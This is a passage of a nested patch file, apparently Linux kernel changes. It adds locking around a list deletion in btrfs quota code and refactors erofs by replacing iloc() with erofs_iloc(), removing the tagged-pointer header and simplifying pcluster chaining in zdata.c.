+ };
+ 
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index f8b0548988858..04ca0a4075b6c 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -1296,7 +1296,9 @@ int btrfs_quota_disable(struct btrfs_fs_info *fs_info)
+ 		goto out;
+ 	}
+ 
++	spin_lock(&fs_info->trans_lock);
+ 	list_del(&quota_root->dirty_list);
++	spin_unlock(&fs_info->trans_lock);
+ 
+ 	btrfs_tree_lock(quota_root->node);
+ 	btrfs_clean_tree_block(quota_root->node);
+diff --git a/fs/erofs/data.c b/fs/erofs/data.c
+index fe8ac0e163f7e..b32801d716f89 100644
+--- a/fs/erofs/data.c
++++ b/fs/erofs/data.c
+@@ -95,11 +95,8 @@ static int erofs_map_blocks_flatmode(struct inode *inode,
+ 		map->m_pa = blknr_to_addr(vi->raw_blkaddr) + map->m_la;
+ 		map->m_plen = blknr_to_addr(lastblk) - offset;
+ 	} else if (tailendpacking) {
+-		/* 2 - inode inline B: inode, [xattrs], inline last blk... */
+-		struct erofs_sb_info *sbi = EROFS_SB(inode->i_sb);
+-
+-		map->m_pa = iloc(sbi, vi->nid) + vi->inode_isize +
+-			vi->xattr_isize + erofs_blkoff(map->m_la);
++		map->m_pa = erofs_iloc(inode) + vi->inode_isize +
++			vi->xattr_isize + erofs_blkoff(offset);
+ 		map->m_plen = inode->i_size - offset;
+ 
+ 		/* inline data should be located in the same meta block */
+@@ -154,7 +151,7 @@ int erofs_map_blocks(struct inode *inode,
+ 		unit = EROFS_BLOCK_MAP_ENTRY_SIZE;	/* block map */
+ 
+ 	chunknr = map->m_la >> vi->chunkbits;
+-	pos = ALIGN(iloc(EROFS_SB(sb), vi->nid) + vi->inode_isize +
++	pos = ALIGN(erofs_iloc(inode) + vi->inode_isize +
+ 		    vi->xattr_isize, unit) + unit * chunknr;
+ 
+ 	kaddr = erofs_read_metabuf(&buf, sb, erofs_blknr(pos), EROFS_KMAP);
+diff --git a/fs/erofs/inode.c b/fs/erofs/inode.c
+index ad2a82f2eb4cd..5aadc73d57652 100644
+--- a/fs/erofs/inode.c
++++ b/fs/erofs/inode.c
+@@ -14,7 +14,7 @@ static void *erofs_read_inode(struct erofs_buf *buf,
+ 	struct super_block *sb = inode->i_sb;
+ 	struct erofs_sb_info *sbi = EROFS_SB(sb);
+ 	struct erofs_inode *vi = EROFS_I(inode);
+-	const erofs_off_t inode_loc = iloc(sbi, vi->nid);
++	const erofs_off_t inode_loc = erofs_iloc(inode);
+ 
+ 	erofs_blk_t blkaddr, nblks = 0;
+ 	void *kaddr;
+diff --git a/fs/erofs/internal.h b/fs/erofs/internal.h
+index 340bd56a57559..d8d09fc3ed655 100644
+--- a/fs/erofs/internal.h
++++ b/fs/erofs/internal.h
+@@ -273,11 +273,6 @@ struct erofs_buf {
+ #define erofs_blkoff(addr)      ((addr) % EROFS_BLKSIZ)
+ #define blknr_to_addr(nr)       ((erofs_off_t)(nr) * EROFS_BLKSIZ)
+ 
+-static inline erofs_off_t iloc(struct erofs_sb_info *sbi, erofs_nid_t nid)
+-{
+-	return blknr_to_addr(sbi->meta_blkaddr) + (nid << sbi->islotbits);
+-}
+-
+ #define EROFS_FEATURE_FUNCS(name, compat, feature) \
+ static inline bool erofs_sb_has_##name(struct erofs_sb_info *sbi) \
+ { \
+@@ -342,8 +337,15 @@ struct erofs_inode {
+ 	struct inode vfs_inode;
+ };
+ 
+-#define EROFS_I(ptr)	\
+-	container_of(ptr, struct erofs_inode, vfs_inode)
++#define EROFS_I(ptr)	container_of(ptr, struct erofs_inode, vfs_inode)
++
++static inline erofs_off_t erofs_iloc(struct inode *inode)
++{
++	struct erofs_sb_info *sbi = EROFS_I_SB(inode);
++
++	return blknr_to_addr(sbi->meta_blkaddr) +
++		(EROFS_I(inode)->nid << sbi->islotbits);
++}
+ 
+ static inline unsigned long erofs_inode_datablocks(struct inode *inode)
+ {
+diff --git a/fs/erofs/tagptr.h b/fs/erofs/tagptr.h
+deleted file mode 100644
+index 64ceb7270b5c1..0000000000000
+--- a/fs/erofs/tagptr.h
++++ /dev/null
+@@ -1,107 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-only */
+-/*
+- * A tagged pointer implementation
+- */
+-#ifndef __EROFS_FS_TAGPTR_H
+-#define __EROFS_FS_TAGPTR_H
+-
+-#include <linux/types.h>
+-#include <linux/build_bug.h>
+-
+-/*
+- * the name of tagged pointer types are tagptr{1, 2, 3...}_t
+- * avoid directly using the internal structs __tagptr{1, 2, 3...}
+- */
+-#define __MAKE_TAGPTR(n) \
+-typedef struct __tagptr##n {	\
+-	uintptr_t v;	\
+-} tagptr##n##_t;
+-
+-__MAKE_TAGPTR(1)
+-__MAKE_TAGPTR(2)
+-__MAKE_TAGPTR(3)
+-__MAKE_TAGPTR(4)
+-
+-#undef __MAKE_TAGPTR
+-
+-extern void __compiletime_error("bad tagptr tags")
+-	__bad_tagptr_tags(void);
+-
+-extern void __compiletime_error("bad tagptr type")
+-	__bad_tagptr_type(void);
+-
+-/* fix the broken usage of "#define tagptr2_t tagptr3_t" by users */
+-#define __tagptr_mask_1(ptr, n)	\
+-	__builtin_types_compatible_p(typeof(ptr), struct __tagptr##n) ? \
+-		(1UL << (n)) - 1 :
+-
+-#define __tagptr_mask(ptr)	(\
+-	__tagptr_mask_1(ptr, 1) ( \
+-	__tagptr_mask_1(ptr, 2) ( \
+-	__tagptr_mask_1(ptr, 3) ( \
+-	__tagptr_mask_1(ptr, 4) ( \
+-	__bad_tagptr_type(), 0)))))
+-
+-/* generate a tagged pointer from a raw value */
+-#define tagptr_init(type, val) \
+-	((typeof(type)){ .v = (uintptr_t)(val) })
+-
+-/*
+- * directly cast a tagged pointer to the native pointer type, which
+- * could be used for backward compatibility of existing code.
+- */
+-#define tagptr_cast_ptr(tptr) ((void *)(tptr).v)
+-
+-/* encode tagged pointers */
+-#define tagptr_fold(type, ptr, _tags) ({ \
+-	const typeof(_tags) tags = (_tags); \
+-	if (__builtin_constant_p(tags) && (tags & ~__tagptr_mask(type))) \
+-		__bad_tagptr_tags(); \
+-tagptr_init(type, (uintptr_t)(ptr) | tags); })
+-
+-/* decode tagged pointers */
+-#define tagptr_unfold_ptr(tptr) \
+-	((void *)((tptr).v & ~__tagptr_mask(tptr)))
+-
+-#define tagptr_unfold_tags(tptr) \
+-	((tptr).v & __tagptr_mask(tptr))
+-
+-/* operations for the tagger pointer */
+-#define tagptr_eq(_tptr1, _tptr2) ({ \
+-	typeof(_tptr1) tptr1 = (_tptr1); \
+-	typeof(_tptr2) tptr2 = (_tptr2); \
+-	(void)(&tptr1 == &tptr2); \
+-(tptr1).v == (tptr2).v; })
+-
+-/* lock-free CAS operation */
+-#define tagptr_cmpxchg(_ptptr, _o, _n) ({ \
+-	typeof(_ptptr) ptptr = (_ptptr); \
+-	typeof(_o) o = (_o); \
+-	typeof(_n) n = (_n); \
+-	(void)(&o == &n); \
+-	(void)(&o == ptptr); \
+-tagptr_init(o, cmpxchg(&ptptr->v, o.v, n.v)); })
+-
+-/* wrap WRITE_ONCE if atomic update is needed */
+-#define tagptr_replace_tags(_ptptr, tags) ({ \
+-	typeof(_ptptr) ptptr = (_ptptr); \
+-	*ptptr = tagptr_fold(*ptptr, tagptr_unfold_ptr(*ptptr), tags); \
+-*ptptr; })
+-
+-#define tagptr_set_tags(_ptptr, _tags) ({ \
+-	typeof(_ptptr) ptptr = (_ptptr); \
+-	const typeof(_tags) tags = (_tags); \
+-	if (__builtin_constant_p(tags) && (tags & ~__tagptr_mask(*ptptr))) \
+-		__bad_tagptr_tags(); \
+-	ptptr->v |= tags; \
+-*ptptr; })
+-
+-#define tagptr_clear_tags(_ptptr, _tags) ({ \
+-	typeof(_ptptr) ptptr = (_ptptr); \
+-	const typeof(_tags) tags = (_tags); \
+-	if (__builtin_constant_p(tags) && (tags & ~__tagptr_mask(*ptptr))) \
+-		__bad_tagptr_tags(); \
+-	ptptr->v &= ~tags; \
+-*ptptr; })
+-
+-#endif	/* __EROFS_FS_TAGPTR_H */
+diff --git a/fs/erofs/xattr.c b/fs/erofs/xattr.c
+index 8106bcb5a38d1..a2776abf36986 100644
+--- a/fs/erofs/xattr.c
++++ b/fs/erofs/xattr.c
+@@ -22,8 +22,7 @@ static int init_inode_xattrs(struct inode *inode)
+ 	struct xattr_iter it;
+ 	unsigned int i;
+ 	struct erofs_xattr_ibody_header *ih;
+-	struct super_block *sb;
+-	struct erofs_sb_info *sbi;
++	struct super_block *sb = inode->i_sb;
+ 	int ret = 0;
+ 
+ 	/* the most case is that xattrs of this inode are initialized. */
+@@ -52,15 +51,14 @@ static int init_inode_xattrs(struct inode *inode)
+ 	 *    undefined right now (maybe use later with some new sb feature).
+ 	 */
+ 	if (vi->xattr_isize == sizeof(struct erofs_xattr_ibody_header)) {
+-		erofs_err(inode->i_sb,
++		erofs_err(sb,
+ 			  "xattr_isize %d of nid %llu is not supported yet",
+ 			  vi->xattr_isize, vi->nid);
+ 		ret = -EOPNOTSUPP;
+ 		goto out_unlock;
+ 	} else if (vi->xattr_isize < sizeof(struct erofs_xattr_ibody_header)) {
+ 		if (vi->xattr_isize) {
+-			erofs_err(inode->i_sb,
+-				  "bogus xattr ibody @ nid %llu", vi->nid);
++			erofs_err(sb, "bogus xattr ibody @ nid %llu", vi->nid);
+ 			DBG_BUGON(1);
+ 			ret = -EFSCORRUPTED;
+ 			goto out_unlock;	/* xattr ondisk layout error */
+@@ -69,11 +67,9 @@ static int init_inode_xattrs(struct inode *inode)
+ 		goto out_unlock;
+ 	}
+ 
+-	sb = inode->i_sb;
+-	sbi = EROFS_SB(sb);
+ 	it.buf = __EROFS_BUF_INITIALIZER;
+-	it.blkaddr = erofs_blknr(iloc(sbi, vi->nid) + vi->inode_isize);
+-	it.ofs = erofs_blkoff(iloc(sbi, vi->nid) + vi->inode_isize);
++	it.blkaddr = erofs_blknr(erofs_iloc(inode) + vi->inode_isize);
++	it.ofs = erofs_blkoff(erofs_iloc(inode) + vi->inode_isize);
+ 
+ 	/* read in shared xattr array (non-atomic, see kmalloc below) */
+ 	it.kaddr = erofs_read_metabuf(&it.buf, sb, it.blkaddr, EROFS_KMAP);
+@@ -159,7 +155,6 @@ static int inline_xattr_iter_begin(struct xattr_iter *it,
+ 				   struct inode *inode)
+ {
+ 	struct erofs_inode *const vi = EROFS_I(inode);
+-	struct erofs_sb_info *const sbi = EROFS_SB(inode->i_sb);
+ 	unsigned int xattr_header_sz, inline_xattr_ofs;
+ 
+ 	xattr_header_sz = inlinexattr_header_size(inode);
+@@ -170,9 +165,8 @@ static int inline_xattr_iter_begin(struct xattr_iter *it,
+ 
+ 	inline_xattr_ofs = vi->inode_isize + xattr_header_sz;
+ 
+-	it->blkaddr = erofs_blknr(iloc(sbi, vi->nid) + inline_xattr_ofs);
+-	it->ofs = erofs_blkoff(iloc(sbi, vi->nid) + inline_xattr_ofs);
+-
++	it->blkaddr = erofs_blknr(erofs_iloc(inode) + inline_xattr_ofs);
++	it->ofs = erofs_blkoff(erofs_iloc(inode) + inline_xattr_ofs);
+ 	it->kaddr = erofs_read_metabuf(&it->buf, inode->i_sb, it->blkaddr,
+ 				       EROFS_KMAP_ATOMIC);
+ 	if (IS_ERR(it->kaddr))
+diff --git a/fs/erofs/zdata.c b/fs/erofs/zdata.c
+index cf4871834ebb2..92b2e4ddb7ce9 100644
+--- a/fs/erofs/zdata.c
++++ b/fs/erofs/zdata.c
+@@ -4,13 +4,174 @@
+  *             https://www.huawei.com/
+  * Copyright (C) 2022 Alibaba Cloud
+  */
+-#include "zdata.h"
+ #include "compress.h"
+ #include <linux/prefetch.h>
+ #include <linux/psi.h>
+ 
+ #include <trace/events/erofs.h>
+ 
++#define Z_EROFS_PCLUSTER_MAX_PAGES	(Z_EROFS_PCLUSTER_MAX_SIZE / PAGE_SIZE)
++#define Z_EROFS_INLINE_BVECS		2
++
++/*
++ * let's leave a type here in case of introducing
++ * another tagged pointer later.
++ */
++typedef void *z_erofs_next_pcluster_t;
++
++struct z_erofs_bvec {
++	struct page *page;
++	int offset;
++	unsigned int end;
++};
++
++#define __Z_EROFS_BVSET(name, total) \
++struct name { \
++	/* point to the next page which contains the following bvecs */ \
++	struct page *nextpage; \
++	struct z_erofs_bvec bvec[total]; \
++}
++__Z_EROFS_BVSET(z_erofs_bvset,);
++__Z_EROFS_BVSET(z_erofs_bvset_inline, Z_EROFS_INLINE_BVECS);
++
++/*
++ * Structure fields follow one of the following exclusion rules.
++ *
++ * I: Modifiable by initialization/destruction paths and read-only
++ *    for everyone else;
++ *
++ * L: Field should be protected by the pcluster lock;
++ *
++ * A: Field should be accessed / updated in atomic for parallelized code.
++ */
++struct z_erofs_pcluster {
++	struct erofs_workgroup obj;
++	struct mutex lock;
++
++	/* A: point to next chained pcluster or TAILs */
++	z_erofs_next_pcluster_t next;
++
++	/* L: the maximum decompression size of this round */
++	unsigned int length;
++
++	/* L: total number of bvecs */
++	unsigned int vcnt;
++
++	/* I: page offset of start position of decompression */
++	unsigned short pageofs_out;
++
++	/* I: page offset of inline compressed data */
++	unsigned short pageofs_in;
++
++	union {
++		/* L: inline a certain number of bvec for bootstrap */
++		struct z_erofs_bvset_inline bvset;
++
++		/* I: can be used to free the pcluster by RCU. */
++		struct rcu_head rcu;
++	};
++
++	union {
++		/* I: physical cluster size in pages */
++		unsigned short pclusterpages;
++
++		/* I: tailpacking inline compressed size */
++		unsigned short tailpacking_size;
++	};
++
++	/* I: compression algorithm format */
++	unsigned char algorithmformat;
++
++	/* L: whether partial decompression or not */
++	bool partial;
++
++	/* L: indicate several pageofs_outs or not */
++	bool multibases;
++
++	/* A: compressed bvecs (can be cached or inplaced pages) */
++	struct z_erofs_bvec compressed_bvecs[];
++};
++
++/* let's avoid the valid 32-bit kernel addresses */
++
++/* the end of a chain of pclusters */
++#define Z_EROFS_PCLUSTER_TAIL           ((void *)0x5F0ECAFE)
++#define Z_EROFS_PCLUSTER_NIL            (NULL)
++
++struct z_erofs_decompressqueue {
++	struct super_block *sb;
++	atomic_t pending_bios;
++	z_erofs_next_pcluster_t head;
++
++	union {
++		struct completion done;
++		struct work_struct work;
++	} u;
++	bool eio, sync;
++};
++
++static inline bool z_erofs_is_inline_pcluster(struct z_erofs_pcluster *pcl)
++{
++	return !pcl->obj.index;
++}
++
++static inline unsigned int z_erofs_pclusterpages(struct z_erofs_pcluster *pcl)
++{
++	if (z_erofs_is_inline_pcluster(pcl))
++		return 1;
++	return pcl->pclusterpages;
++}
++
++/*
++ * bit 30: I/O error occurred on this page
++ * bit 0 - 29: remaining parts to complete this page
++ */
++#define Z_EROFS_PAGE_EIO			(1 << 30)
++
++static inline void z_erofs_onlinepage_init(struct page *page)
++{
++	union {
++		atomic_t o;
++		unsigned long v;
++	} u = { .o = ATOMIC_INIT(1) };
++
++	set_page_private(page, u.v);
++	smp_wmb();
++	SetPagePrivate(page);
++}
++
++static inline void z_erofs_onlinepage_split(struct page *page)
++{
++	atomic_inc((atomic_t *)&page->private);
++}
++
++static inline void z_erofs_page_mark_eio(struct page *page)
++{
++	int orig;
++
++	do {
++		orig = atomic_read((atomic_t *)&page->private);
++	} while (atomic_cmpxchg((atomic_t *)&page->private, orig,
++				orig | Z_EROFS_PAGE_EIO) != orig);
++}
++
++static inline void z_erofs_onlinepage_endio(struct page *page)
++{
++	unsigned int v;
++
++	DBG_BUGON(!PagePrivate(page));
++	v = atomic_dec_return((atomic_t *)&page->private);
++	if (!(v & ~Z_EROFS_PAGE_EIO)) {
++		set_page_private(page, 0);
++		ClearPagePrivate(page);
++		if (!(v & Z_EROFS_PAGE_EIO))
++			SetPageUptodate(page);
++		unlock_page(page);
++	}
++}
++
++#define Z_EROFS_ONSTACK_PAGES		32
++
+ /*
+  * since pclustersize is variable for big pcluster feature, introduce slab
+  * pools implementation for different pcluster sizes.
+@@ -175,25 +336,6 @@ static void z_erofs_free_pcluster(struct z_erofs_pcluster *pcl)
+ 	DBG_BUGON(1);
+ }
+ 
+-/* how to allocate cached pages for a pcluster */
+-enum z_erofs_cache_alloctype {
+-	DONTALLOC,	/* don't allocate any cached pages */
+-	/*
+-	 * try to use cached I/O if page allocation succeeds or fallback
+-	 * to in-place I/O instead to avoid any direct reclaim.
+-	 */
+-	TRYALLOC,
+-};
+-
+-/*
+- * tagged pointer with 1-bit tag for all compressed pages
+- * tag 0 - the page is just found with an extra page reference
+- */
+-typedef tagptr1_t compressed_page_t;
+-
+-#define tag_compressed_page_justfound(page) \
+-	tagptr_fold(compressed_page_t, page, 1)
+-
+ static struct workqueue_struct *z_erofs_workqueue __read_mostly;
+ 
+ void z_erofs_exit_zip_subsystem(void)
+@@ -230,20 +372,6 @@ int __init z_erofs_init_zip_subsystem(void)
+ 
+ enum z_erofs_pclustermode {
+ 	Z_EROFS_PCLUSTER_INFLIGHT,
+-	/*
+-	 * The current pclusters was the tail of an exist chain, in addition
+-	 * that the previous processed chained pclusters are all decided to
+-	 * be hooked up to it.
+-	 * A new chain will be created for the remaining pclusters which are
+-	 * not processed yet, so different from Z_EROFS_PCLUSTER_FOLLOWED,
+-	 * the next pcluster cannot reuse the whole page safely for inplace I/O
+-	 * in the following scenario:
+-	 *  ________________________________________________________________
+-	 * |      tail (partial) page     |       head (partial) page       |
+-	 * |   (belongs to the next pcl)  |   (belongs to the current pcl)  |
+-	 * |_______PCLUSTER_FOLLOWED______|________PCLUSTER_HOOKED__________|
+-	 */
+-	Z_EROFS_PCLUSTER_HOOKED,
+ 	/*
+ 	 * a weak form of Z_EROFS_PCLUSTER_FOLLOWED, the difference is that it
+ 	 * could be dispatched into bypass queue later due to uptodated managed
+@@ -261,8 +389,8 @@ enum z_erofs_pclustermode {
+ 	 *  ________________________________________________________________
+ 	 * |  tail (partial) page |          head (partial) page           |
+ 	 * |  (of the current cl) |      (of the previous collection)      |
+-	 * | PCLUSTER_FOLLOWED or |                                        |
+-	 * |_____PCLUSTER_HOOKED__|___________PCLUSTER_FOLLOWED____________|
++	 * |                      |                                        |
++	 * |__PCLUSTER_FOLLOWED___|___________PCLUSTER_FOLLOWED____________|
+ 	 *
+ 	 * [  (*) the above page can be used as inplace I/O.               ]
+ 	 */
+@@ -275,7 +403,7 @@ struct z_erofs_decompress_frontend {
+ 	struct z_erofs_bvec_iter biter;
+ 
+ 	struct page *candidate_bvpage;
+-	struct z_erofs_pcluster *pcl, *tailpcl;
++	struct z_erofs_pcluster *pcl;
+ 	z_erofs_next_pcluster_t owned_head;
+ 	enum z_erofs_pclustermode mode;
+ 
+@@ -292,12 +420,29 @@ struct z_erofs_decompress_frontend {
+ 	.inode = __i, .owned_head = Z_EROFS_PCLUSTER_TAIL, \
+ 	.mode = Z_EROFS_PCLUSTER_FOLLOWED, .backmost = true }
+ 
++static bool z_erofs_should_alloc_cache(struct z_erofs_decompress_frontend *fe)
++{
++	unsigned int cachestrategy = EROFS_I_SB(fe->inode)->opt.cache_strategy;
++
++	if (cachestrategy <= EROFS_ZIP_CACHE_DISABLED)
++		return false;
++
++	if (fe->backmost)
++		return true;
++
++	if (cachestrategy >= EROFS_ZIP_CACHE_READAROUND &&
++	    fe->map.m_la < fe->headoffset)
++		return true;
++
++	return false;
++}
++
+ static void z_erofs_bind_cache(struct z_erofs_decompress_frontend *fe,
+-			       enum z_erofs_cache_alloctype type,
+ 			       struct page **pagepool)
+ {
+ 	struct address_space *mc = MNGD_MAPPING(EROFS_I_SB(fe->inode));
+ 	struct z_erofs_pcluster *pcl = fe->pcl;
++	bool shouldalloc = z_erofs_should_alloc_cache(fe);
+ 	bool standalone = true;
+ 	/*
+ 	 * optimistic allocation without direct reclaim since inplace I/O
+@@ -312,7 +457,7 @@ static void z_erofs_bind_cache(struct z_erofs_decompress_frontend *fe,
+ 
+ 	for (i = 0; i < pcl->pclusterpages; ++i) {
+ 		struct page *page;
+-		compressed_page_t t;
++		void *t;	/* mark pages just found for debugging */
+ 		struct page *newpage = NULL;
+ 
+ 		/* the compressed page was loaded before */
+@@ -322,26 +467,26 @@ static void z_erofs_bind_cache(struct z_erofs_decompress_frontend *fe,
+ 		page = find_get_page(mc, pcl->obj.index + i);
+ 
+ 		if (page) {
+-			t = tag_compressed_page_justfound(page);
++			t = (void *)((unsigned long)page | 1);
+ 		} else {
+ 			/* I/O is needed, no possible to decompress directly */
+ 			standalone = false;
+-			switch (type) {
+-			case TRYALLOC:
+-				newpage = erofs_allocpage(pagepool, gfp);
+-				if (!newpage)
+-					continue;
+-				set_page_private(newpage,
+-						 Z_EROFS_PREALLOCATED_PAGE);
+-				t = tag_compressed_page_justfound(newpage);
+-				break;
+-			default:        /* DONTALLOC */
++			if (!shouldalloc)
+ 				continue;
+-			}
++
++			/*
++			 * try to use cached I/O if page allocation
++			 * succeeds or fallback to in-place I/O instead
++			 * to avoid any direct reclaim.
++			 */
++			newpage = erofs_allocpage(pagepool, gfp);
++			if (!newpage)
++				continue;
++			set_page_private(newpage, Z_EROFS_PREALLOCATED_PAGE);
++			t = (void *)((unsigned long)newpage | 1);
+ 		}
+ 
+-		if (!cmpxchg_relaxed(&pcl->compressed_bvecs[i].page, NULL,
+-				     tagptr_cast_ptr(t)))
++		if (!cmpxchg_relaxed(&pcl->compressed_bvecs[i].page, NULL, t))
+ 			continue;
+ 
+ 		if (page)
+@@ -464,19 +609,7 @@ static void z_erofs_try_to_claim_pcluster(struct z_erofs_decompress_frontend *f)
+ 		return;
+ 	}
+ 
+-	/*
+-	 * type 2, link to the end of an existing open chain, be careful
+-	 * that its submission is controlled by the original attached chain.
+-	 */
+-	if (*owned_head != &pcl->next && pcl != f->tailpcl &&
+-	    cmpxchg(&pcl->next, Z_EROFS_PCLUSTER_TAIL,
+-		    *owned_head) == Z_EROFS_PCLUSTER_TAIL) {
+-		*owned_head = Z_EROFS_PCLUSTER_TAIL;
+-		f->mode = Z_EROFS_PCLUSTER_HOOKED;
+-		f->tailpcl = NULL;
+-		return;
+-	}
+-	/* type 3, it belongs to a chain, but it isn't the end of the chain */
++	/* type 2, it belongs to an ongoing chain */
+ 	f->mode = Z_EROFS_PCLUSTER_INFLIGHT;
+ }
+ 
+@@ -537,9 +670,6 @@ static int z_erofs_register_pcluster(struct z_erofs_decompress_frontend *fe)
+ 			goto err_out;
+ 		}
+ 	}
+-	/* used to check tail merging loop due to corrupted images */
+-	if (fe->owned_head == Z_EROFS_PCLUSTER_TAIL)
+-		fe->tailpcl = pcl;
+ 	fe->owned_head = &pcl->next;
+ 	fe->pcl = pcl;
+ 	return 0;
+@@ -560,7 +690,6 @@ static int z_erofs_collector_begin(struct z_erofs_decompress_frontend *fe)
+ 
+ 	/* must be Z_EROFS_PCLUSTER_TAIL or pointed to previous pcluster */
+ 	DBG_BUGON(fe->owned_head == Z_EROFS_PCLUSTER_NIL);
+-	DBG_BUGON(fe->owned_head == Z_EROFS_PCLUSTER_TAIL_CLOSED);
+ 
+ 	if (!(map->m_flags & EROFS_MAP_META)) {
+ 		grp = erofs_find_workgroup(fe->inode->i_sb,
+@@ -579,10 +708,6 @@ static int z_erofs_collector_begin(struct z_erofs_decompress_frontend *fe)
+ 
+ 	if (ret == -EEXIST) {
+ 		mutex_lock(&fe->pcl->lock);
+-		/* used to check tail merging loop due to corrupted images */
+-		if (fe->owned_head == Z_EROFS_PCLUSTER_TAIL)
+-			fe->tailpcl = fe->pcl;
+-
+ 		z_erofs_try_to_claim_pcluster(fe);
+ 	} else if (ret) {
+ 		return ret;
+@@ -638,20 +763,6 @@ static bool z_erofs_collector_end(struct z_erofs_decompress_frontend *fe)
+ 	return true;
+ }
+ 
+-static bool should_alloc_managed_pages(struct z_erofs_decompress_frontend *fe,
+-				       unsigned int cachestrategy,
+-				       erofs_off_t la)
+-{
+-	if (cachestrategy <= EROFS_ZIP_CACHE_DISABLED)
+-		return false;
+-
+-	if (fe->backmost)
+-		return true;
+-
+-	return cachestrategy >= EROFS_ZIP_CACHE_READAROUND &&
+-		la < fe->headoffset;
+-}
+-
+ static int z_erofs_read_fragment(struct inode *inode, erofs_off_t pos,
+ 				 struct page *page, unsigned int pageofs,
+ 				 unsigned int len)
+@@ -688,12 +799,9 @@ static int z_erofs_do_read_page(struct z_erofs_decompress_frontend *fe,
+ 				struct page *page, struct page **pagepool)
+ {
+ 	struct inode *const inode = fe->inode;
+-	struct erofs_sb_info *const sbi = EROFS_I_SB(inode);
+ 	struct erofs_map_blocks *const map = &fe->map;
+ 	const loff_t offset = page_offset(page);
+ 	bool tight = true, exclusive;
+-
+-	enum z_erofs_cache_alloctype cache_strategy;
+ 	unsigned int cur, end, spiltted;
+ 	int err = 0;
+ 
+@@ -747,13 +855,7 @@ repeat:
+ 		fe->mode = Z_EROFS_PCLUSTER_FOLLOWED_NOINPLACE;
+ 	} else {
+ 		/* bind cache first when cached decompression is preferred */
+-		if (should_alloc_managed_pages(fe, sbi->opt.cache_strategy,
+-					       map->m_la))
+-			cache_strategy = TRYALLOC;
+-		else
+-			cache_strategy = DONTALLOC;
+-
+-		z_erofs_bind_cache(fe, cache_strategy, pagepool);
++		z_erofs_bind_cache(fe, pagepool);
+ 	}
+ hitted:
+ 	/*
+@@ -762,8 +864,7 @@ hitted:
+ 	 * those chains are handled asynchronously thus the page cannot be used
+ 	 * for inplace I/O or bvpage (should be processed in a strict order.)
+ 	 */
+-	tight &= (fe->mode >= Z_EROFS_PCLUSTER_HOOKED &&
+-		  fe->mode != Z_EROFS_PCLUSTER_FOLLOWED_NOINPLACE);
++	tight &= (fe->mode > Z_EROFS_PCLUSTER_FOLLOWED_NOINPLACE);
+ 
+ 	cur = end - min_t(unsigned int, offset + end - map->m_la, end);
+ 	if (!(map->m_flags & EROFS_MAP_MAPPED)) {
+@@ -1144,10 +1245,7 @@ static void z_erofs_decompress_queue(const struct z_erofs_decompressqueue *io,
+ 	};
+ 	z_erofs_next_pcluster_t owned = io->head;
+ 
+-	while (owned != Z_EROFS_PCLUSTER_TAIL_CLOSED) {
+-		/* impossible that 'owned' equals Z_EROFS_WORK_TPTR_TAIL */
+-		DBG_BUGON(owned == Z_EROFS_PCLUSTER_TAIL);
+-		/* impossible that 'owned' equals Z_EROFS_PCLUSTER_NIL */
++	while (owned != Z_EROFS_PCLUSTER_TAIL) {
+ 		DBG_BUGON(owned == Z_EROFS_PCLUSTER_NIL);
+ 
+ 		be.pcl = container_of(owned, struct z_erofs_pcluster, next);
+@@ -1164,7 +1262,7 @@ static void z_erofs_decompressqueue_work(struct work_struct *work)
+ 		container_of(work, struct z_erofs_decompressqueue, u.work);
+ 	struct page *pagepool = NULL;
+ 
+-	DBG_BUGON(bgq->head == Z_EROFS_PCLUSTER_TAIL_CLOSED);
++	DBG_BUGON(bgq->head == Z_EROFS_PCLUSTER_TAIL);
+ 	z_erofs_decompress_queue(bgq, &pagepool);
+ 
+ 	erofs_release_pages(&pagepool);
+@@ -1172,12 +1270,12 @@ static void z_erofs_decompressqueue_work(struct work_struct *work)
+ }
+ 
+ static void z_erofs_decompress_kickoff(struct z_erofs_decompressqueue *io,
+-				       bool sync, int bios)
++				       int bios)
+ {
+ 	struct erofs_sb_info *const sbi = EROFS_SB(io->sb);
+ 
+ 	/* wake up the caller thread for sync decompression */
+-	if (sync) {
++	if (io->sync) {
+ 		if (!atomic_add_return(bios, &io->pending_bios))
+ 			complete(&io->u.done);
+ 		return;
+@@ -1207,8 +1305,6 @@ static struct page *pickup_page_for_submission(struct z_erofs_pcluster *pcl,
+ 
+ 	struct address_space *mapping;
+ 	struct page *oldpage, *page;
+-
+-	compressed_page_t t;
+ 	int justfound;
+ 
+ repeat:
+@@ -1218,10 +1314,8 @@ repeat:
+ 	if (!page)
+ 		goto out_allocpage;
+ 
+-	/* process the target tagged pointer */
+-	t = tagptr_init(compressed_page_t, page);
+-	justfound = tagptr_unfold_tags(t);
+-	page = tagptr_unfold_ptr(t);
++	justfound = (unsigned long)page & 1UL;
++	page = (struct page *)((unsigned long)page & ~1UL);
+ 
+ 	/*
+ 	 * preallocated cached pages, which is used to avoid direct reclaim
+@@ -1309,9 +1403,8 @@ out:	/* the only exit (for tracing and debugging) */
+ 	return page;
+ }
+ 
+-static struct z_erofs_decompressqueue *
+-jobqueue_init(struct super_block *sb,
+-	      struct z_erofs_decompressqueue *fgq, bool *fg)
++static struct z_erofs_decompressqueue *jobqueue_init(struct super_block *sb,
++			      struct z_erofs_decompressqueue *fgq, bool *fg)
+ {
+ 	struct z_erofs_decompressqueue *q;
+ 
+@@ -1328,9 +1421,10 @@ fg_out:
+ 		init_completion(&fgq->u.done);
+ 		atomic_set(&fgq->pending_bios, 0);
+ 		q->eio = false;
++		q->sync = true;
+ 	}
+ 	q->sb = sb;
+-	q->head = Z_EROFS_PCLUSTER_TAIL_CLOSED;
++	q->head = Z_EROFS_PCLUSTER_TAIL;
+ 	return q;
+ }
+ 
+@@ -1341,20 +1435,6 @@ enum {
+ 	NR_JOBQUEUES,
+ };
+ 
+-static void *jobqueueset_init(struct super_block *sb,
+-			      struct z_erofs_decompressqueue *q[],
+-			      struct z_erofs_decompressqueue *fgq, bool *fg)
+-{
+-	/*
+-	 * if managed cache is enabled, bypass jobqueue is needed,
+-	 * no need to read from device for all pclusters in this queue.
+-	 */
+-	q[JQ_BYPASS] = jobqueue_init(sb, fgq + JQ_BYPASS, NULL);
+-	q[JQ_SUBMIT] = jobqueue_init(sb, fgq + JQ_SUBMIT, fg);
+-
+-	return tagptr_cast_ptr(tagptr_fold(tagptr1_t, q[JQ_SUBMIT], *fg));
+-}
+-
+ static void move_to_bypass_jobqueue(struct z_erofs_pcluster *pcl,
